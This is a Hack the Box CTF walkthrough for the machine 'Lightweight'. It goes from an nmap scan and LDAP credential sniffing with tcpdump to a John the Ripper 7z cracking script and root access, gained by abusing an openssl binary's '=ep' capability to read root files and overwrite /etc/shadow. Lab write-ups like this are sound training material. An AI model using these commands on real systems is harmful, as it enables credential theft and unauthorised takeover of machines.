It's been a while since I've had any free time to devote to Hack the Box recently as life has been getting in the way as well as working my way through the newly released AWAE course from Offensive Security. But I finally found a few spare moments to brush off some of the cobwebs and have a go at the machine, Lightweight.
As always, we begin with our trusty nmap scan.
nmap -sC -sV -p- -oA scan 10.10.10.119
Not too many services here, so lets start with HTTP.
Browsing to the IP gives us nothing so add the hostname
Browsing the various links gives us some interesting info. After making a HTTP request to the user page, the system will have created us an ssh login where the username and password is just our IP - so we can just ssh straight to the server after visiting that page.
No user flag yet though - that would be too easy.
Looking in the home directory, we see a couple of users using plain IP addresses as usernames (such as our own), but there's another couple in there that look interesting,
So as we can see from our initial
nmap scan that the LDAP port is open, perhaps the website uses
ldap for authentication? And seeing as it is a plain text protocol, maybe we can capture some of the traffic.
tcpdump -i lo port 389 -w capture.pcap
In order to actually generate some traffic, whilst
tcpdump is listening, browse through the website pages - the status one seems to take a long time for no real reason so we'll start there.
Once you have some traffic captures, copy file back to our Kali box and open it in wireshark, and then filter by
That authentication line looks interesting.
SSH credentials are not linux credentials however so we can't
ssh in using this new password. We can just
Our new home folder has a file in there called backup.7z (and the first flag) so download it and let's take a look.
As we do not have
ssh credentials for the
ldapuser2 we can get the file another way.
cat backup.7z | base64
We can then copy and paste the base64 encoded string to a file on our machine, and then decode it back into 7zip format.
cat encoded | base64 --decode > backup.7z
Then try to unzip it.
7z x backup.7z
Password protected. Bugger.
But we can write a little bash script to utilise John The Ripper to crack the password - or we can use some google-fu and find one already written for us ;)
echo "7zip-JTR Decrypt Script"; if [ $# -ne 2 ] then echo "Usage $0 <7z file> <wordlist>"; exit; fi 7z l $1 echo "Generating wordlist..." john --wordlist="$2" --rules --stdout | while read i do echo -ne "\rTrying \"$i\" " 7z x -p$i $1 -aoa 2>/dev/null STATUS=$? if [ $STATUS -eq 0 ]; then echo -e "\rArchive password is: \"$i\"" break fi done
And in fairly short order, it finds the password and decrypts the file for us.
The archive seems to contain a backup of the source files for the website we browsed earlier.
Taking a look at the source for the
status.php file, gives us the password to another user,
Using that we can make use of
Our new home directory has some interesting binaries in it,
Through our enumeration when looking for interesting files, when we look at files with special capabilities, one of our binaries shows up with something interesting.
getcap -r / 2>/dev/null
=ep privilege is special. It’s essentially blank, but what this actually means is that if you call it from the right location, then it will inherit the permissions of where it is called from ... so if you run it from the root directory, then you inherit everything!
So we can abuse this to read (or write) files we should not have access to.
First we generate some certificates:
cd /tmp ~/openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
Accept all the default options, then once generated we can use
openssl to start a HTTP server.
cd / ~/openssl s_server -key /tmp/key.pem -cert /tmp/cert.pem -port 1337 -HTTP
Then using another shell, we can get the root flag.
We use the
-k flag to ignore any SSL errors.
Now we could stop here, or we could go for a root shell.
Stretch Goal - root shell
Using the same HTTP server exploit above, we can read the
/etc/shadow file and copy the contents to a temporary file.
Then we can generate a new root password.
mkpasswd -m sha-512 -S saltsalt -s
Enter your chosen password, then replace the password section of the shadow file for the root user with your new hashed password.
Then we encrypt our temporary shadow file.
openssl smime -encrypt -aes256 -in /tmp/shadow -binary -outform DER -out /tmp/shadow.enc /tmp/cert.pem
Now we overwrite the existing shadow file.
cd / ~/openssl smime -decrypt -in /tmp/shadow.enc -inform DER -inkey /tmp/key.pem -out /etc/shadow
Then we simply
su root, enter our new password and a root shell is ours.